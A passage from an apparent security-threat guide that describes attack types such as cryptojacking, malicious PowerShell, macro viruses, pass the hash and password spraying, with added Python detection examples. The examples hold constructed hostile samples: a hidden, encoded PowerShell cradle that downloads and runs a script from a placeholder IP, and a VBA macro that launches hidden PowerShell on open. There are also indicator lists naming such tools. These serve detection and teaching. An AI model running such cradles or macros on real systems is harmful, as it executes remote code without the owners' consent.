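    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", active_content(render_results_vulnerable(payload)))
        print("safe:      ", active_content(render_results_safe(payload)))
```

Entity encoding is the right fix for the HTML body and attribute contexts shown here; data placed inside a script block, a URL or a CSS value needs that context's own encoding, which is why real template engines expose context-aware escaping and why a Content Security Policy and HttpOnly cookies belong alongside it as defense in depth.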

While XSS attacks are not as common as they once were — due primarily to improvements in browsers and security technology — they’re still prevalent enough to rank within the top ten threats listed by the Open Web Application Security Project, and the Common Vulnerabilities and Exposures database lists nearly 14,000 vulnerabilities associated with XSS attacks.


Cryptojacking Attack

What you need to know: Cryptojacking is an attack in which a hacker hijacks computer systems with malware that hides on a device and uses its processing power to mine cryptocurrency, such as Bitcoin or Ethereum, at the victim's expense. The hacker's mission is to create valuable cryptocurrency with someone else's computing resources.

One common way cryptojacking attacks happen is by sending a malicious link in a phishing email, enticing users to download cryptomining code directly onto their computer. Another way is embedding JavaScript mining code in a web page the user visits, known as a drive-by attack. In that case nothing is written to disk: the mining script runs inside the browser tab for as long as the page stays open. Either way the mining code works silently in the background without the user's knowledge, and a slower than usual computer or a fan running flat out might be the only indication that something is wrong.

These attacks come from all over the world because cryptojacking doesn’t require significant technical skills. Cryptojacking kits are available on the deep web for as little as $30. It’s a low bar of entry for hackers that want to make a quick buck for relatively little risk. In one attack, a European bank experienced some unusual traffic patterns on its servers, slower than average night processes, and unexplained online servers — all attributed to a rogue staffer who installed a cryptomining system.


DDoS Attack

What you need to know: A DDoS attack is an attempt by hackers, hacktivists or cyber spies to take down websites, slow down and crash the target servers and make online service unavailable by flooding them with traffic from multiple sources. As their name suggests, DDoS attacks are widely distributed brute-force attempts to wreak havoc and cause destruction. These attacks often tend to target popular or high-profile sites, such as banks, news and government websites, to thwart or deter target organizations from publishing important information or to weaken them financially.

The malicious actors behind DDoS attacks aim to wreak havoc on their targets, sabotage web properties, damage brand reputation and prompt financial losses by preventing users from accessing a website or network resource. DDoS leverages hundreds or thousands of infected "bot" computers located all over the world. Known as botnets, these armies of compromised computers will execute the attack at the same time for full effectiveness.

The hacker or group of hackers that control these infected computers are known as botmasters; they infect vulnerable systems with malware, often trojans. When enough devices are infected, the botmaster gives them the command to attack and the target servers and networks are bombarded with requests for service, which effectively chokes them and shuts them down.

As their name implies, DDoS attacks are distributed, meaning that the incoming flood of traffic targeting the victim’s network originates from numerous sources. Thus, the hackers behind these attacks can literally be from anywhere in the world. What’s more, their distributed nature makes it impossible to stop these attacks simply by securing or blocking a single source.


IoMT Threats

What you need to know: The Internet of Medical Things (IoMT) has transformed healthcare as we know it, especially in the era of COVID-19. Leveraging IoMT has the power to unleash countless opportunities in diagnosing, treating and managing a patient’s health and wellness, and holds the key to lowering cost while improving quality of care. But as the number of connected devices invariably grows, so does the cybersecurity risk. As of 2020, more than 25% of cyberattacks in healthcare delivery organizations involve IoMT.

Because digital technologies age faster than their physical counterparts, which typically have a long product life cycle, outdated equipment and software are creating serious cybersecurity vulnerabilities for both hospitals and patients. Many manufacturers don't allow customers to troubleshoot and patch their own devices, and will even go so far as to void warranties if they do. Compounded with a lack of encryption, hardcoded credentials and lax security controls, there's little that healthcare organizations can do to mitigate risk where legacy devices are involved beyond isolating them on the network.

IoMT attackers have the ability and resources to pinpoint healthcare providers with ambiguous security ownership, as well as poor asset or inventory visibility, and out-of-date systems and devices.


Malicious Powershell 

What you need to know: PowerShell is a command-line shell and scripting language developed by Microsoft and built on .NET (pronounced "dot net") that lets administrators and users change system settings and automate tasks. Its flexibility and reach make it a popular shell and scripting language. Attackers have recognized the same perks: PowerShell is already present and trusted on every modern Windows host, so a script can do the attacker's work in memory without dropping a conventional executable for antivirus to scan (a "living off the land" technique).

Since PowerShell runs on the majority of enterprise machines, and since many companies don't log what their scripts actually execute, the logic behind this type of attack is clear. Malware doesn't need to be installed on disk for a malicious script to run, so file-based detection is bypassed and the attacker can operate at their leisure. The practical countermeasure is visibility: enable PowerShell Script Block Logging (Event ID 4104) and Module Logging, turn on command-line auditing for process creation events (Event ID 4688), and alert on encoded or download-and-execute command lines.
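Encoded command lines are the most common way attackers hide what a PowerShell invocation does, and they are also easy to unwrap: the -EncodedCommand argument is base64 over UTF-16LE text. The following added example (not code from the page or from Splunk) decodes that argument from a process command line and scores the result against a short indicator list. The command lines are constructed, the download URL is a placeholder, and the indicator list is illustrative rather than complete.

```python
import base64
import re

# Substrings commonly seen in malicious invocations (illustrative, not exhaustive;
# "iex" will also match inside unrelated words, so treat the score as a triage hint).
INDICATORS = [
    "iex", "invoke-expression", "downloadstring", "net.webclient",
    "frombase64string", "-nop", "-w hidden", "-windowstyle hidden",
    "bypass", "invoke-mimikatz",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match them all
# (but not -ExecutionPolicy, which is followed by a letter rather than whitespace).
_ENCODED_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom"
    r"|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none
    or the payload is not valid base64-wrapped UTF-16LE."""
    match = _ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Decode if needed, then match indicators against both the raw and decoded text."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline.lower()
    if decoded:
        haystack += "\n" + decoded.lower()
    hits = sorted({indicator for indicator in INDICATORS if indicator in haystack})
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}


# Constructed samples: a download-and-execute cradle wrapped the way attackers
# commonly wrap it (placeholder URL), and a benign scheduled backup script.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage.ps1')"
MALICIOUS_CMDLINE = ("powershell.exe -nop -w hidden -ep bypass -enc "
                     + base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii"))
BENIGN_CMDLINE = r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for cmdline in (MALICIOUS_CMDLINE, BENIGN_CMDLINE):
        report = analyze_command_line(cmdline)
        print(f"score={report['score']} indicators={report['indicators']}")
        if report["decoded"]:
            print("  decoded:", report["decoded"])
```

On Windows the raw command line comes from Event ID 4688 (with command-line auditing enabled) or Sysmon Event ID 1; Script Block Logging (Event ID 4104) records the decoded script directly, including scripts built at runtime from string fragments, which this command-line view cannot see.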

This type of attack is more sophisticated than other methods, and is usually executed by a power hacker who knows exactly what they’re doing (versus an amateur who might resort to brute force attacks). Ever stealth in their approach, they’re adept at covering their tracks, and know how to move laterally across a network.


Man-in-the-Middle Attack

What you need to know: In a MITM attack, also known as adversary-in-the-middle (AiTM), the malicious actor inserts themselves between two parties or systems and relays traffic between them, gaining access to and/or pilfering sensitive information. A common modern form sets up a proxy server that intercepts the victim's login session, capturing credentials and session cookies in transit. This type of attack lets a malicious actor intercept, send and receive data intended for somebody else, or inject data that was never meant to be sent, without either party knowing until it is too late.

Virtually anyone could execute a man-in-the-middle attack on an unencrypted connection. Since the widespread adoption of HTTPS (and of HSTS, which stops a browser from falling back to plain HTTP), these attacks are more difficult to execute and therefore rarer. In an MITM attack, the hacker sits between the user and the real website (or other user) and passes the data between them, exfiltrating whatever they like from the interaction.

Because improvements in security technologies have made MITM attacks more difficult to execute, the groups attempting them tend to be sophisticated hackers or state actors. In 2018, the Dutch authorities caught four Russian GRU officers (the group tracked as Fancy Bear, or APT28) parked outside the Organisation for the Prohibition of Chemical Weapons in The Hague, attempting a close-access Wi-Fi attack to steal employee credentials. The same year, the U.S. and UK governments released warnings that Russian state-sponsored actors were actively targeting routers in homes and enterprises for the purpose of MITM exfiltration.


System Misconfiguration

What you need to know: Security misconfiguration is a widespread problem that can put organizations at risk thanks to incorrectly configured security controls (or lack thereof). This can happen at almost any level of the IT and security stack, ranging from the company’s wireless network, to web and server applications, to custom code.

This type of attack usually happens because of missing patches, use of default accounts, unnecessary services, insecure default configuration and poor documentation. This could be attributed to everything from a failure to set a security header on a web server, to forgetting to disable administrative access for certain levels of employees. This attack can also happen when hackers take root in legacy applications with inherent misconfigurations due to a lack of updates.

Misconfiguration isn't a malicious act in and of itself; it is mostly the result of human error. However, attackers may know where to look if they suspect a lax level of configuration across a certain organization’s IT stack.


Watering Hole Attack

What you need to know: Like a literal watering hole, a watering hole attack is one in which the user’s computer is compromised by visiting an infected website hosting malware designed to infiltrate their network and steal data or financial assets. The specific technique is essentially a zero-day attack — the goal being to infect the computer system with malware in order to gain access to a network for financial gain or proprietary information.

The attackers will first profile their target to determine the websites they frequently visit, and from there, will look for vulnerabilities. By exploiting identified flaws, the attacker compromises these websites and then waits, knowing it’s only a matter of time before the user in question visits. The compromised website will, in turn, infect their network, allowing attackers to gain entry into their entire system and then move laterally to other systems.

While they come from all over, many of the cybercriminals behind this attack originate where organized threat groups flourish, such as Russia, Eastern Europe and China. In 2018, a country-level watering hole attack was sourced to the Chinese threat group known as “LuckyMouse” (aka “Iron Tiger,” “EmissaryPanda,” “APT 27” and “Threat Group 3390”), known for targeting government, energy and manufacturing sectors with numerous types of attacks, including watering hole assaults.


Zero-Day Exploit

What you need to know: A zero-day vulnerability, at its core, is a flaw. It is a weakness within a piece of software or a computer network that hackers take advantage of soon (or immediately) after it becomes available for general use — the term “zero” refers to the same-day window in which these vulnerabilities are abused.

A zero-day attack happens once the vulnerability is exploited. The nature of the vulnerability will affect how the attack is implemented, but zero-day attacks follow a pattern. First, the hacker (or a group of hackers working together) scans the code base for vulnerabilities. Once they find the flaw, they create code that exploits the vulnerability. They infiltrate the system (using one or more of the methods described in this book) and infect it with their malicious code, then launch the exploit.

The prevalence of technology has led to explosive growth in zero-day attacks. While these attacks can ostensibly be launched from anywhere, they often proliferate from nation-states or regions with extensive cyber underworld networks and infrastructure. Recent reports have cited that the bulk of zero-day threats in 2021 were sourced to hacking groups in China.


Initial access

Drive-by Download Attack

What you need to know: A drive-by download refers to the unintentional download of malicious code onto a computer or mobile device that exposes users to different types of threats. Cybercriminals use drive-by downloads to steal and collect personal information, inject banking Trojans or introduce exploit kits or other malware to user devices. To be protected against drive-by downloads, regularly update or patch systems with the latest versions of apps, software, browsers and operating systems. It’s also recommended to stay away from insecure or potentially malicious websites.

What makes drive-by downloads different is that users do not need to click on anything to initiate the download. Simply accessing or browsing a website can activate the download. The malicious code is designed to download malicious files onto the victim’s device without the user’s knowledge. A drive-by download abuses insecure, vulnerable or outdated apps, browsers or even operating systems.

The rise of prepackaged drive-by download kits allows hackers of any skill level to launch these kinds of attacks. In fact, these kits can be purchased and deployed without the hacker writing their own code or establishing their own infrastructure for data exfiltration or other abuses. The ease with which these attacks can be executed means that they can come from virtually anywhere.


Phishing Attack

What you need to know: A phishing attack tricks everyday consumers, users or employees into clicking on a malicious link delivered via email, direct message or other communication, often driving them to a bogus site that asks for personally identifiable information such as bank account numbers, credit card information or passwords. Be wary — while these bogus sites may look convincing, attackers will harvest any information you submit to them. Or they may launch malware aimed at stealing funds from your accounts, personally identifiable customer information or other critical assets.

Typically you’ll be lured by an email impersonating someone you know — a message that appears to be from a manager or coworker, for example — compelling you to open malicious attachments or click links that lead you to webpages practically identical to legitimate sites.

Just a few decades ago, a large number of phishing attacks were sourced to Nigeria in what were known as 419 scams, due to their fraud designation in the Nigerian criminal code. Today, phishing attacks originate from all over the world, with many occurring in BRIC countries (Brazil, Russia, India and China), according to the InfoSec Institute. Because of the ease and availability of phishing toolkits, even hackers with minimal technical skills can launch phishing campaigns. The people behind these campaigns run the gamut from individual hackers to organized cybercriminals.


Social Engineering Attack

What you need to know: Social engineering is the term used for a broad range of malicious activities accomplished through psychological manipulation to trick users into making security mistakes or giving away sensitive information. What makes social engineering especially dangerous is that it relies on human error, rather than vulnerabilities in software and operating systems. Mistakes made by legitimate users are much less predictable, making them harder to identify and thwart than a malware-based intrusion.

Social engineering attacks come in many different forms and can be performed anywhere human interaction is involved. A perpetrator first investigates the intended victim to gather the necessary background information — such as potential points of entry and weak security protocols — needed to proceed with the attack. Then, the attacker gains the victim’s trust and provides stimuli for subsequent actions that break security practices, such as revealing sensitive information or granting access to critical resources.

Social engineering can come from many sources and motivations, and the following are five common forms of digital social engineering assault. Most commonly, it comes in the form of phishing emails. Other forms include pretexting, where the attacker creates a plausible pretext to steal important data; baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for login credentials; and tailgating or piggybacking, in which an attacker gains access to a restricted area of a business by following an authenticated employee through secure doors.


SQL Injection

What you need to know: SQL injection is a type of injection attack used to manipulate or destroy databases using malicious SQL statements. SQL statements control the database of your web application and can be used to bypass security measures if user inputs are not properly sanitized.

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data, execute administration operations on the database, recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

Because so much of the internet is built on relational databases, SQL injection attacks are exceedingly common. Searching the Common Vulnerabilities and Exposures database for “injection” returns 15,000 results.


Supply Chain Attack

What you need to know: A supply chain attack is a powerful cyberattack that can breach even the most sophisticated security defenses through legitimate third-party vendors. Because vendors need access to sensitive data in order to integrate with their customers’ internal systems, when they are compromised in a cyberattack, often their customers’ data is too. And because vendors store sensitive data for numerous customers, a single supply chain attack gives hackers access to the sensitive data of many organizations, across many industries. The severity of supply chain attacks cannot be overstated. And the recent spate of these attacks suggests this method is now the state actors’ attack du jour.

A supply chain attack uses legitimate, trusted processes to gain full access to organizations’ data by targeting the vendor’s software source code, updates or build processes. They are difficult to detect because they happen outside the victim’s own attack surface, at the vendor. Compromised vendors then unwittingly transmit malware to their customers’ networks. Victims can be breached through third-party software updates, application installers and malware on connected devices. One software update can infect thousands of organizations, with minimal effort from the hacker, who now has “legitimate” access to move laterally across thousands of organizations.

Supply chain attacks are large-scale, sophisticated attacks perpetrated by sophisticated threat actors, often nation-state sponsored and ideologically motivated, though financial gain is also a big motivation. 


Lateral movement

Application Access Token

What you need to know: With an OAuth access token, a hacker can use the user-granted REST API to perform functions such as email searching and contact enumeration. With a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.

Attackers may use application access tokens to bypass the typical authentication process and access restricted accounts, information or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Compromised access tokens may be used as an initial step to compromising other services. For example, if a token grants access to a victim’s primary email, the attacker may be able to extend access to all other services that the target subscribes to by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to countermeasures like changing passwords.


Cloud Access Management 

What you need to know: Managing permissions for your organization has become increasingly important in order to avoid a cloud-based breach. Lax or nonexistent security — and in this case, incorrectly configured security controls — can easily jeopardize the security of your data, exposing your organization to an unnecessary amount of risk, including significant damage to brand reputation.

This attack usually happens because of poor communication, lack of protocol, insecure default configuration and poor documentation. Once the attacker exploits the vulnerability and gains a foothold in your cloud environment, they can leverage privileges to access other remote entry points, looking for insecure applications and databases, or weak network controls. They can then exfiltrate data while remaining undetected.

Mismanagement and misconfiguration of a cloud environment isn't considered a malicious act in and of itself, and as mentioned, typically occurs due to human error.


Macro Viruses

What you need to know: A macro virus is a computer virus written in the same macro language that is used for software applications. Some applications, like Microsoft Office, Excel and PowerPoint, allow macro programs to be embedded in documents such that the macros run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in emails, or emails from unrecognized senders. Many antivirus programs can detect macro viruses; however, a macro virus’s behavior can still be difficult to detect.
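An added example, not code from the page: a small triage check over a constructed VBA module that flags auto-execute entry points (Document_Open and friends) together with shell-like calls, the combination that lets a macro run on open and reach outside the document. The auto-exec and indicator lists are assumptions, and a real document would first need its VBA project extracted (for example with the olevba tool).

```python
import re

# Constructed VBA module text standing in for a macro extracted from a
# document; it is a made-up sample, not code from the page.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -nop -w hidden -enc " & Payload, 0
End Sub

Sub FormatReport()
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
'''

# Procedure names Office invokes without a click (assumed list of the
# well-known auto-execute entry points across Word and Excel).
AUTO_EXEC = {"autoopen", "auto_open", "document_open", "workbook_open",
             "autoexec", "autoclose", "auto_close", "document_close"}

# Calls that rarely belong in a document-formatting macro but are common
# in droppers (assumed indicator list; matched case-insensitively).
SUSPICIOUS = ["CreateObject", "WScript.Shell", "Shell", "powershell",
              "URLDownloadToFile", "Environ", "-enc"]

PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)",
    re.IGNORECASE | re.MULTILINE,
)


def triage_vba(source: str) -> dict:
    """Return the procedures found, which of them auto-execute, the
    suspicious indicators present, and a coarse verdict."""
    procs = PROC_RE.findall(source)
    auto = [p for p in procs if p.lower() in AUTO_EXEC]
    lowered = source.lower()
    hits = [kw for kw in SUSPICIOUS if kw.lower() in lowered]
    # Autorun on its own (a form that fills in a date) or a Shell call on its
    # own (a build script) deserve a look; both together is the macro-virus
    # pattern: execute on open, then leave the document.
    if auto and hits:
        verdict = "suspicious"
    elif auto or hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"procedures": procs, "auto_exec": auto,
            "indicators": hits, "verdict": verdict}
```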


Pass the Hash

What you need to know: Pass the hash allows an attacker to authenticate as a user with the underlying NTLM or LanMan hash of that user’s password instead of the plaintext password itself. Once the hacker has a valid username along with the password’s hash value, they can get into the user’s account without issue, and perform actions on local or remote systems. Essentially, hashes replace the original passwords they were generated from.

On systems using NTLM authentication, a user’s password or passphrase is never submitted in cleartext. Instead, it’s sent as a hash in response to a challenge-response authentication scheme. Because the hash is all that is needed to answer the challenge, an attacker first captures valid password hashes for the account being used with a credential access technique, then reuses them in that exchange.

This type of attack is more sophisticated than other methods, and is usually executed by highly organized, motivated threat groups with their sights set on a specific organization or person, and with a mind to political or financial gain.
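An added detection example, not code from the page: two heuristics run over constructed, already-parsed Windows Security event 4624 records. The first (a type 9 logon through the seclogo logon process on the foothold host) is modelled on commonly published detection rules and is an assumption here; the second flags an NTLM network logon for a human account from a host missing from that user's Kerberos or interactive baseline.

```python
from collections import defaultdict


def _logon(logon_type, process, package, user, workstation, ip):
    """Constructed 4624 record with just the fields the checks need."""
    return {"EventID": 4624, "LogonType": logon_type,
            "LogonProcessName": process, "AuthenticationPackageName": package,
            "TargetUserName": user, "WorkstationName": workstation,
            "IpAddress": ip}


# Historical logons used to learn which hosts each user normally signs in
# from (constructed sample).
BASELINE_EVENTS = [
    _logon(2, "User32", "Negotiate", "alice", "WS-ALICE", "-"),
    _logon(3, "Kerberos", "Kerberos", "alice", "WS-ALICE", "10.0.0.5"),
    _logon(3, "Kerberos", "Kerberos", "bob", "WS-BOB", "10.0.0.9"),
]

# New events to examine (constructed sample).
NEW_EVENTS = [
    _logon(3, "Kerberos", "Kerberos", "alice", "WS-ALICE", "10.0.0.5"),
    # A stolen hash injected into a fresh logon session on the foothold host
    # shows up as a NewCredentials (type 9) logon via the seclogo process.
    _logon(9, "seclogo", "Negotiate", "alice", "WS-BOB", "::1"),
    # Replaying that hash to a server yields an NTLM network logon for alice
    # from a workstation she has never used.
    _logon(3, "NtLmSsp", "NTLM", "alice", "WS-BOB", "10.0.0.9"),
    # Machine accounts authenticate with NTLM routinely and are excluded.
    _logon(3, "NtLmSsp", "NTLM", "WS-BOB$", "WS-BOB", "10.0.0.9"),
]


def build_baseline(events):
    """Map each user to the workstations seen in non-NTLM (Kerberos or
    interactive) logons, i.e. sessions that needed the real password."""
    baseline = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4624 and ev["AuthenticationPackageName"] != "NTLM":
            baseline[ev["TargetUserName"]].add(ev["WorkstationName"])
    return baseline


def is_hash_injection(ev):
    """Source-side heuristic (assumed): logon type 9 through seclogo."""
    return (ev["EventID"] == 4624 and ev["LogonType"] == 9
            and ev["LogonProcessName"].lower() == "seclogo"
            and ev["AuthenticationPackageName"] == "Negotiate")


def is_ntlm_from_new_host(ev, baseline):
    """Target-side heuristic: NTLM network logon for a human account from a
    host absent from that user's password-backed logon history."""
    user = ev["TargetUserName"]
    if ev["EventID"] != 4624 or ev["LogonType"] != 3:
        return False
    if ev["AuthenticationPackageName"] != "NTLM":
        return False
    if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
        return False
    return ev["WorkstationName"] not in baseline.get(user, set())


def find_pth_candidates(events, baseline):
    """Return (rule, user, workstation) tuples for events worth triage."""
    alerts = []
    for ev in events:
        if is_hash_injection(ev):
            alerts.append(("hash_injection_logon",
                           ev["TargetUserName"], ev["WorkstationName"]))
        elif is_ntlm_from_new_host(ev, baseline):
            alerts.append(("ntlm_logon_from_new_host",
                           ev["TargetUserName"], ev["WorkstationName"]))
    return alerts
```

The baseline check is the noisier of the two in real estates (new laptops, jump hosts), so it is best paired with the account's normal logon pattern before escalating.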


Suspicious Cloud Authentication Activities

What you need to know: Organizations need to move away from relying on network security alone in order to better protect and authenticate user identities. Up until recently, however, this was much easier said than done. Certain technologies simply lacked the necessary integration capabilities, limiting an organization’s ability to centrally monitor the overall security of their resources.

Now there are countless technologies available that revolve around access control, like multifactor authentication (MFA). To avoid illegitimate authentication on cloud applications, no user or device — whether internal or external to the organization — should be implicitly trusted, and access to all resources should be explicitly and continuously authenticated and authorized.

The attacker can easily penetrate the network or breach the perimeter when an IAM framework is weak or absent, and when an organization is still relying on network or endpoint security alone. In both cases, because the identity access controls are so lax, the attacker can log in with stolen credentials without being detected, and then move laterally across the network and any connected systems, compromising assets and causing irrevocable damage — ultimately giving them free rein.

Between the growing number of phishing attacks, increasing number of user identities and the continued growth of cloud adoption, this type of attack can come from anywhere, including third-party vendors, employees, remote workers and contractors.


Suspicious Zoom Child Processes

What you need to know: Essentially, these local privilege escalation flaws take advantage of Zoom’s software architecture designs. These exploits can be launched by a local attacker, in which the adversary is someone who already has physical control of a vulnerable computer. Once the bugs are exploited, attackers can gain and sustain persistent access to various functions of a victim’s computer, which allows them to install ransomware, Trojans, spyware and numerous other types of malicious code into targeted systems for nefarious purposes.

One way this attack can happen is through the Zoom installer designed to install the Zoom macOS app without any user interaction. In this scenario, a local adversary with low-level user privileges can inject the Zoom installer with malware to obtain the highest, root-level privileges, which allow them to access the underlying Mac operating system and make it easier to run malware or spyware without the consent or knowledge of the user.

Another bug exploits a flaw in Zoom’s local library validation function. An attacker can load a malicious third-party library into Zoom’s process/address space, where it automatically inherits all of Zoom’s access rights, and gain control over camera and microphone permissions without the user’s knowledge or consent.

What makes this particular vulnerability unique is that an attacker needs physical access to a victim’s computer in order to exploit its multiple flaws. So this attack either comes from the inside, or from hackers who have gained access to a lost or stolen laptop or computer system. Another attack scenario includes a post-malware infection that could be perpetrated by a remote adversary, but with pre-existing access to the targeted system, likely via a prior malware exploit.


Privilege escalation

Amazon Web Services (AWS) Attacks

What you need to know: Amazon's "shared responsibility" model says AWS is responsible for the environment outside of the virtual machine but the customer is responsible for the security inside of the S3 container.

This means that threats exploiting misconfigurations and deployment errors have become a bigger problem as companies have adopted cloud technologies rapidly, because the organization using AWS is responsible for securing its own environment. The result is a growing set of threats that AWS customers have to worry about.

An attack on an AWS instance can happen in a number of ways. The accelerated shift to the cloud brought on by the global COVID-19 pandemic increased the number of threats for cloud providers.

It’s important to stay vigilant for suspicious behavior inside an AWS environment, including S3 access from unfamiliar locations or by unfamiliar users.

It’s also important to monitor and control who has access to an organization’s AWS infrastructure. Detecting suspicious logins to AWS infrastructure provides a good starting point for investigations. Abusive behavior enabled by compromised credentials can lead to direct monetary costs, because the customer is billed for any EC2 instances the attacker creates.

Because of the diversity of services being hosted on AWS and the new types of cloud threats being spun up daily, these attacks can come from virtually anywhere and anyone.


Insider Threat 

What you need to know: An insider threat attack is a malicious assault carried out by insiders with authorized access to your organization’s computer systems, network and resources. In this assault, attackers often aim to pilfer classified, proprietary or otherwise sensitive information and assets, either for personal gain or to provide information to competitors. They might also try to sabotage your organization with system disruptions that mean loss of productivity, profitability and reputation.

Malicious insiders have a distinct advantage in that they already have authorized access to your company’s network, information and assets. They may have accounts that give them access to critical systems or data, making it easy for them to locate it, circumvent security controls and send it outside of the organization.

Inside attackers can be employees in the organization with bad intentions or cyberspies impersonating contractors, third parties or remote workers. They may work autonomously, or as part of nation-states, crime rings or competing organizations. While they might also be remote third-party suppliers or contractors located all over the world, they usually have some level of legitimate access to the organization’s systems and data.


Router and Infrastructure Security

What you need to know: Router implants have been rare, and are largely believed to be theoretical in nature and use. However, recent vendor advisories indicate that these have been seen in the wild. The initial infection vector does not appear to leverage a zero-day vulnerability. It is believed that the credentials are either default or discovered by the attacker in order to install the backdoor. However, the router's position in the network makes it an ideal target for re-entry or further infection.

Networking devices, such as routers and switches, are often overlooked as resources that attackers will leverage to subvert an enterprise. Attackers compromise network devices and can then obtain direct access to the company's internal infrastructure — effectively increasing the attack surface and accessing private services/data.

Advanced threat actors have shown a proclivity to target these critical assets as a means to siphon and redirect network traffic, flash backdoored operating systems and deploy weakened cryptographic algorithms to more easily decrypt network traffic.


SIMjacking

What you need to know: SIMjacking (also known as a SIM swap scam, port-out scam, SIM splitting and SIM swapping) is a type of account takeover that generally targets a weakness in two-factor authentication and two-step verification in which the second factor is a text message (SMS) or call placed to a mobile telephone. Simply put, SIMjacking is when an attacker impersonates a target to a cellular provider in order to steal their cell phone number by having it transferred to a different SIM card (which is already in the hacker’s possession).

A hacker calls the support line for a mobile service provider, pretending to be the target, saying they’ve lost their SIM card. They can verify their identity because they have acquired some amount of the target’s personal information (address, passwords or SSN) through one of the many database hacks in the last decade. The service provider’s employee, having no way of knowing that the person on the other end of the line is not who they say they are, makes the switch. Instantly, that phone number — the key associated with so much of digital life — is under the attacker’s control.

Simjackers are typically looking to extort victims for something of great value — like Bitcoin or other cryptocurrency wallets or high-value social media accounts — or to cause harm to their reputations, as Chuckling Squad did with Jack Dorsey. These hackers can come from anywhere in the world, and can be members of organized groups or solitary actors.


Suspicious Okta Activity

What you need to know: Okta is the leading single sign-on (SSO) provider, allowing users to authenticate once to Okta, and from there access a variety of web-based applications. These applications are assigned to users and allow administrators to centrally manage which users are allowed to access which applications. Okta also provides centralized logging to help understand how the applications are used and by whom.

While SSO is a major convenience for users, it also provides attackers with an opportunity. If the attacker can gain access to Okta, they can access a variety of applications.

This exposure lends itself to credential stuffing attacks, in which the bad actor acquires usernames and passwords from a variety of sources such as breached websites, phishing attacks and password dump sites. By conducting brute force attacks with the help of automated tools, the adversary tests those credentials at scale against a plethora of websites to see if any logins succeed and gain access to the site. From there, attackers have the ability to launch any number of attacks, including phishing or spam campaigns, accessing PII and other sensitive information, and financially draining stolen accounts.

Password spraying attacks, which are essentially brute force attacks, feed numerous usernames into an automated program that attempts to guess associated passwords. As the name implies, it relies on a “spray” technique in the hopes that one of the username/password combinations is correct. And it only takes one.

These attacks can essentially come from anywhere. While it is possible that they can be traced to sophisticated cybercrime networks, they can also be executed by less sophisticated, individual, remote hackers with access to automated tools that can conduct a copious number of brute force attacks at once.
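An added example, not code from the page or from Okta: telling a spray apart from a single-account brute-force attempt in constructed JSON records modelled on Okta System Log field names (eventType, published, actor.alternateId, client.ipAddress, outcome.result and outcome.reason; the schema and thresholds are assumptions), by counting failed user.session.start events per source IP in a tumbling window.

```python
import json
from collections import defaultdict
from datetime import datetime, timezone


def _event(minute, user, ip, result="FAILURE", reason="INVALID_CREDENTIALS"):
    """Constructed log line shaped like an Okta System Log record."""
    return json.dumps({
        "eventType": "user.session.start",
        "published": f"2024-01-01T10:{minute:02d}:00.000Z",
        "actor": {"alternateId": user},
        "client": {"ipAddress": ip},
        "outcome": {"result": result,
                    "reason": reason if result == "FAILURE" else None},
    })


RAW_LOG = (
    # one source cycling through many accounts, one guess each: a spray
    [_event(m, f"user{m:02d}@corp.example", "203.0.113.7") for m in range(12)]
    # one source hammering a single account: classic brute force
    + [_event(m, "bob@corp.example", "198.51.100.4") for m in range(8)]
    # a legitimate user who mistypes twice and then signs in
    + [_event(20, "alice@corp.example", "192.0.2.10"),
       _event(21, "alice@corp.example", "192.0.2.10"),
       _event(22, "alice@corp.example", "192.0.2.10", result="SUCCESS")]
)

WINDOW_MIN = 15          # tumbling window size in minutes (assumed)
SPRAY_MIN_USERS = 5      # distinct accounts from one IP to call it a spray
SPRAY_MAX_PER_USER = 2   # sprays stay low per account to avoid lockouts
BRUTE_MIN_ATTEMPTS = 5   # failures on one account from one IP


def _window_key(published):
    """Truncate an ISO timestamp to the start of its tumbling window."""
    ts = datetime.strptime(published, "%Y-%m-%dT%H:%M:%S.%fZ")
    ts = ts.replace(tzinfo=timezone.utc)
    return ts.replace(minute=(ts.minute // WINDOW_MIN) * WINDOW_MIN,
                      second=0, microsecond=0)


def classify_auth_failures(raw_lines):
    """Return (kind, ip, detail) findings over JSON log lines."""
    # (ip, window) -> user -> failed attempts
    failures = defaultdict(lambda: defaultdict(int))
    for line in raw_lines:
        ev = json.loads(line)
        if ev["eventType"] != "user.session.start":
            continue
        if ev["outcome"]["result"] != "FAILURE":
            continue
        if ev["outcome"]["reason"] != "INVALID_CREDENTIALS":
            continue
        key = (ev["client"]["ipAddress"], _window_key(ev["published"]))
        failures[key][ev["actor"]["alternateId"]] += 1

    findings = []
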